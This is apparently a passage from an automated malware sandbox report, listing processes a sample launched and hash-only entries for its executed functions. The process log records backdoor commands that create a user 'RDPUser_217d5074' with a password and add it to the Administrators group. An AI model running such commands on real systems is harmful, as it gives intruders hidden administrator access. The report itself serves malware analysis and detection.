                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net localgroup
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f330000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net localgroup
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 localgroup
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:21:31:00
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                                                  Imagebase:0xdf0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 01412165 Relevance: .4, Instructions: 353COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 552675cd16f19fe3337ddc9c5d0e157acc8c83f94d5b08c39dc651d99c76f795
                                                    • Instruction ID: ff5cb0412c2efaebce762b06c66d74b367b542fd5613600c307a5cb64f3a732b
                                                    • Opcode Fuzzy Hash: 552675cd16f19fe3337ddc9c5d0e157acc8c83f94d5b08c39dc651d99c76f795
                                                    • Instruction Fuzzy Hash: 5D21E234A502089FCB05EB78D464AAD7BF6EF9C300F20405AE501E736ACA759C45CF90
                                                    Function 01410981 Relevance: .1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2cc7b1bc6a23f312679c9d367e0955d6f0426dcdbd0a6389001a99ff106608db
                                                    • Instruction ID: 47d2afe0a30ce6f90da6ba7f2bbe60aaf9332a0e4a5a5ee09070b87eaca1e14b
                                                    • Opcode Fuzzy Hash: 2cc7b1bc6a23f312679c9d367e0955d6f0426dcdbd0a6389001a99ff106608db
                                                    • Instruction Fuzzy Hash: 4D419F31B002059FDB24DF28D55469EBBF6EFC8340F24492AE486E7369DB30AC86CB51
                                                    Function 01410C18 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b31302e74ed97930f9fa73bfedebf77e3de7b54f0fb0586afed7afb8720a0341
                                                    • Instruction ID: a399b13b5ed0d89e73cf73eff88228b6a758d0e494cca45e7e5f1c43bb2a1cd0
                                                    • Opcode Fuzzy Hash: b31302e74ed97930f9fa73bfedebf77e3de7b54f0fb0586afed7afb8720a0341
                                                    • Instruction Fuzzy Hash: 22411874A002098FDB15DF59C444ADEBBF2BF89320F59819AE405BB365C774AD86CFA0
                                                    Function 01411CF8 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7df1ef3ccece30c5b953d6b9f48e9e785b1bd8d1b621e92e262bea8dbab69ec8
                                                    • Instruction ID: aba924d3641f133532928f3ed2ff718a9dea9bcaafd636ef1e2c6c50d76b4ec1
                                                    • Opcode Fuzzy Hash: 7df1ef3ccece30c5b953d6b9f48e9e785b1bd8d1b621e92e262bea8dbab69ec8
                                                    • Instruction Fuzzy Hash: AF315B307003099FCB09A77DC99066F7BAAFFC5710F10486AE115A7369CA31EC42C790
                                                    Function 01410C08 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2341d44c15a73cdec56c61e9533cc5e0f2dd3b36390deaf8615c6a0d4451555
                                                    • Instruction ID: 4584180ba9eee774ca009f33ccfd97e74cdac1d2715af443da2ca0b9e9c61c87
                                                    • Opcode Fuzzy Hash: f2341d44c15a73cdec56c61e9533cc5e0f2dd3b36390deaf8615c6a0d4451555
                                                    • Instruction Fuzzy Hash: 44313C35A00209CFDB15DF69C444ADDBBF2AF89320F18819AE445BB365C775AD86CFA0
                                                    Function 014115C8 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a8b892fc09fea9393ecf9aac7f7e3dc717026891020c80391abc00d66b4ca30
                                                    • Instruction ID: c379c852092525183bbaacb6ca1da3f903fb633263a1f6a6062d8e805378269e
                                                    • Opcode Fuzzy Hash: 9a8b892fc09fea9393ecf9aac7f7e3dc717026891020c80391abc00d66b4ca30
                                                    • Instruction Fuzzy Hash: 2B21D331E04209EFDB05EBB8D9805DEBFF6AF89700F1884A7E401A7229DB305D45CB61
                                                    Function 014115D5 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 615fdda607f53a0d8998fa38ed7c78172e9bc77a59d6d5ca0098a84ca83c0b61
                                                    • Instruction ID: cde2e98b51524079c804acef6aff3bad86f9681fc327b70c696a801bfb2e522d
                                                    • Opcode Fuzzy Hash: 615fdda607f53a0d8998fa38ed7c78172e9bc77a59d6d5ca0098a84ca83c0b61
                                                    • Instruction Fuzzy Hash: 7A218031E04209EFCB05EBB8D9806DEBFF6AF89700F1885A7E401A7219CA356D45CB61
                                                    Function 01411E20 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19e7dde0b605724f054a68d1ae5c939624862beca54f42346eec7fe354fdd62f
                                                    • Instruction ID: 6682bcf99e631c299536dd035a26223e2fa2830af02490bf700774fe558a87c3
                                                    • Opcode Fuzzy Hash: 19e7dde0b605724f054a68d1ae5c939624862beca54f42346eec7fe354fdd62f
                                                    • Instruction Fuzzy Hash: 6111E335B00318DFDF0467BD99143AFBAAEEB84B20F00443AE609D3398DA35C94587D1
                                                    Function 01412420 Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d67b28f9bb32039524b0b402f60cdb422911c8077c35197488aa34f065ac9d20
                                                    • Instruction ID: 87020862890beb2e08c659be858113e62b601b2fbe812ba44ce7a441825455c2
                                                    • Opcode Fuzzy Hash: d67b28f9bb32039524b0b402f60cdb422911c8077c35197488aa34f065ac9d20
                                                    • Instruction Fuzzy Hash: 15218C31A50208EFCB08EB69D554AAD7BF6EB8C700F20802AE501E7368CB75AC41CF90
                                                    Function 01411F41 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c653709afd9ca56d94cd5301f8861452e0afb0ed0f1e1248089bc46095f9b66c
                                                    • Instruction ID: cb38459c1991e6fc02919fda8aa29c165a931b7b7981a591965f34165ba78832
                                                    • Opcode Fuzzy Hash: c653709afd9ca56d94cd5301f8861452e0afb0ed0f1e1248089bc46095f9b66c
                                                    • Instruction Fuzzy Hash: 7711D0306042558FDB25DB38C4647EEBBF2AF88704F00046ED046AB3A5CFB6AC08CB61
                                                    Function 01411F48 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cdedd8b1b9599ec728e7015ccdc11422269363472d2323d66edbcf515261f4e
                                                    • Instruction ID: bad70316db67882f99ac7ffcda973cbd00316499554af1fd67885e659a02fcae
                                                    • Opcode Fuzzy Hash: 5cdedd8b1b9599ec728e7015ccdc11422269363472d2323d66edbcf515261f4e
                                                    • Instruction Fuzzy Hash: DF1190316042558FDB14DB38C4547DEBBF2AF48704F00046ED146AB3A5CBB6AC04CBA1
                                                    Function 01410AFA Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63307a1885cb6071b8ae6e0106570a46a66903dca70a3118187e0750a34d2e31
                                                    • Instruction ID: ad400dea6f8a00ccd0342c4e5b1396c8a030d2207ba83105cb756de22e2f2744
                                                    • Opcode Fuzzy Hash: 63307a1885cb6071b8ae6e0106570a46a66903dca70a3118187e0750a34d2e31
                                                    • Instruction Fuzzy Hash: B701D632D1070E9BCB019BB9D8400DDFB7AEFC9310F554666E010B7160E770248BC751
                                                    Function 011BD7F1 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3517317193.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_11bd000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e58a127aa28e93fd32d06d2402479c94afbf3981ca21a6565ca94772e52bec2b
                                                    • Instruction ID: 80c4f5b632779a8e0cba922082221868f2f4d14e09dcbefd385cf9db442f994c
                                                    • Opcode Fuzzy Hash: e58a127aa28e93fd32d06d2402479c94afbf3981ca21a6565ca94772e52bec2b
                                                    • Instruction Fuzzy Hash: 02012B314083049AEB1D4AAADDC47A7FFD8EF40729F18C429ED0C0A186C338D840CBB2
                                                    Function 01410877 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6be31b022e48c62e0218dddabb84713409b84e0821c6d7f13f0c81a4cfe564f1
                                                    • Instruction ID: 735a6edf334b7d1aa9f7caa20bdcd7ab91becb216d9a9cedd46ab5c4bc80a507
                                                    • Opcode Fuzzy Hash: 6be31b022e48c62e0218dddabb84713409b84e0821c6d7f13f0c81a4cfe564f1
                                                    • Instruction Fuzzy Hash: B9017132D1060B9BCB009BB8D8404DDB7B5EFCA320F168666D511B7160FB74259ECFA0
                                                    Function 01411C40 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0e3a56ba3038f3dbf8232e07ba45b94f4e853d4c67aa0fee9eb516e0cf3a6f4
                                                    • Instruction ID: 9e4a1ba0a5f44f071a60206ad3d844d4d59dda2d10ac124e33cfc8f91c61d81c
                                                    • Opcode Fuzzy Hash: e0e3a56ba3038f3dbf8232e07ba45b94f4e853d4c67aa0fee9eb516e0cf3a6f4
                                                    • Instruction Fuzzy Hash: 3B0180306043599BDB25E728C4147EEBBF2BB85704F00092ED142AB394DFBA6945CBA1
                                                    Function 01410B08 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e4af229228d874e2ffa61ed650339bb87a7aa2a37d3d280f089d6cb5c7257d2
                                                    • Instruction ID: 40f09f847cfd66f649cefd7151cb2745a47c57d1464393a138a5c5ae9dcc1974
                                                    • Opcode Fuzzy Hash: 1e4af229228d874e2ffa61ed650339bb87a7aa2a37d3d280f089d6cb5c7257d2
                                                    • Instruction Fuzzy Hash: 12014F32D1060AABCF00DBA9E8404DEFBBAEFC9320F554666E111B7150EB70258ACB90
                                                    Function 01410B82 Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 434850d91367c7fef13e1ac2bf20cb72e3fa4f3f1accafa653ae09214df552bc
                                                    • Instruction ID: 5f5e1daeaab7acd4b38bc933b2be874172abe2ef577c5e0e1a609390ea398688
                                                    • Opcode Fuzzy Hash: 434850d91367c7fef13e1ac2bf20cb72e3fa4f3f1accafa653ae09214df552bc
                                                    • Instruction Fuzzy Hash: 8AF0F6719502099BCF159B78C424AEFBBBAAF84700F41482AE002BB284DF716907C7D2
                                                    Function 014108F7 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d09b742fc87d06fa70d1425eb90e17c26a629bdca3cd4ce3e7a504f8c82ad92
                                                    • Instruction ID: 24d7a92fbc16fd2c7fd97c42056b69c2b82977059ea7c1749af21ccf585b9b48
                                                    • Opcode Fuzzy Hash: 4d09b742fc87d06fa70d1425eb90e17c26a629bdca3cd4ce3e7a504f8c82ad92
                                                    • Instruction Fuzzy Hash: 31F0FF3292020A9BEF149B74C0A45EFBFB6AB84300F04892AD002B7244DEB059068F82
                                                    Function 011BD7F0 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3517317193.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_11bd000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1bbc1f74bd382a9866eaeb1aed87fea5ee2c8c2c2150109707aef37e2a3cc39a
                                                    • Instruction ID: b54b66e296214c042501fcb7fedca2db7e97a7e6b8bf67ba4e8877b426c84c74
                                                    • Opcode Fuzzy Hash: 1bbc1f74bd382a9866eaeb1aed87fea5ee2c8c2c2150109707aef37e2a3cc39a
                                                    • Instruction Fuzzy Hash: 67F062714093449EEB158A1ADDC4BA6FFA8EB41739F18C45AED0C4F286C3799844CB71
                                                    Function 01410908 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7559dd5a4c9c7e7d2e5888c056e7fa63976568482e443b6aaa87309d50a4005
                                                    • Instruction ID: 777ee9a06b98014bb128c398af228ae3c97ff8813f7cadd50fbbb1134d1af1bd
                                                    • Opcode Fuzzy Hash: a7559dd5a4c9c7e7d2e5888c056e7fa63976568482e443b6aaa87309d50a4005
                                                    • Instruction Fuzzy Hash: 04F0E232E201099BDF14DB74C4659EFBFBA9F84310F05852AE002B7254DEB069068BD2
                                                    Function 01412905 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96ca781202309180ca84dcdbb3d3a6a80753c1b0c4afd9184333f02c9d96fa7e
                                                    • Instruction ID: bd1208bacfac7c27fa56c184a2d632036851afcb62ef8cbe7b940880b5924012
                                                    • Opcode Fuzzy Hash: 96ca781202309180ca84dcdbb3d3a6a80753c1b0c4afd9184333f02c9d96fa7e
                                                    • Instruction Fuzzy Hash: 44F05430A502199BDF14EB5DC514BEE7AF6FB48740F20451AD401F7398CBB91A01CBE5
                                                    Function 01411E19 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 118ca6d64972deaf4a45836e68d465a57d8cddb6c6c20e305a040eebc3ecacde
                                                    • Instruction ID: f82c6b2b879e488bc2f7c22ff2d3038a627a63f36d834de895f7259e23696f79
                                                    • Opcode Fuzzy Hash: 118ca6d64972deaf4a45836e68d465a57d8cddb6c6c20e305a040eebc3ecacde
                                                    • Instruction Fuzzy Hash: ACF01C75D003059EDB90ABB998042EBBEF5AF88A60F10417BDA09D2255E735C605CBA1
                                                    Function 01411EE9 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4efd6a9c83886169761a7a907baffdddc11309e570ac64561fd1e1a1ae9fd8c5
                                                    • Instruction ID: 7a9c69ae028f11a93dbaa95d2b22099e8d397fad1adc764a3fe3f61100529439
                                                    • Opcode Fuzzy Hash: 4efd6a9c83886169761a7a907baffdddc11309e570ac64561fd1e1a1ae9fd8c5
                                                    • Instruction Fuzzy Hash: FDE092302942C5AFDF12DB70FA746A43FB0EB96604F1444EFF5488B59BD6229817D701
                                                    Function 01410838 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de630ac0d59b311d0901742cad5045a036baa19ff12fda4a2799559b1e5ae2c2
                                                    • Instruction ID: 4e5340a3f84c17fac96b7cd46cc13f82f1eb39c88a3a00144d6d3a12388d95da
                                                    • Opcode Fuzzy Hash: de630ac0d59b311d0901742cad5045a036baa19ff12fda4a2799559b1e5ae2c2
                                                    • Instruction Fuzzy Hash: 76E0263180A3889FDB02CFB89A2479CBFB8AB02240F5440C6E488DB217C5309E51CBA2
                                                    Function 01411BF8 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc441aa39aa5144e5b1a3113006204966d33554cfe264a0bb1146d0980fd9ec
                                                    • Instruction ID: 2455df16d0563d0881158efa0c7c66d7a5b26043a85ec39ebf38e8430f630419
                                                    • Opcode Fuzzy Hash: afc441aa39aa5144e5b1a3113006204966d33554cfe264a0bb1146d0980fd9ec
                                                    • Instruction Fuzzy Hash: EFD02B3174011457CF0632B8B5140A6338ED784A24B000036DA0DC3388EF65984343C1
                                                    Function 01410848 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 728d22c5539496ec81ba72e94eabcc7def9033c4da3c4a8ad860fda2741cc075
                                                    • Instruction ID: 9064c97b9180ecda42934e39c030a6f7c1701a1d1b0ee3972f998f1b1f56184d
                                                    • Opcode Fuzzy Hash: 728d22c5539496ec81ba72e94eabcc7def9033c4da3c4a8ad860fda2741cc075
                                                    • Instruction Fuzzy Hash: A0D01772905208AFEB11DFA8D50575DBBB8AB05240F614496E848CB219DA319E50C791
                                                    Function 01410D72 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7596de8203c3f65c8491a2df950a0ed3a4052eaa3583473067d21faacf96f56
                                                    • Instruction ID: 0555c229e785eaa1050d0d118b20b8a92132c7766e768531b90e31602742653e
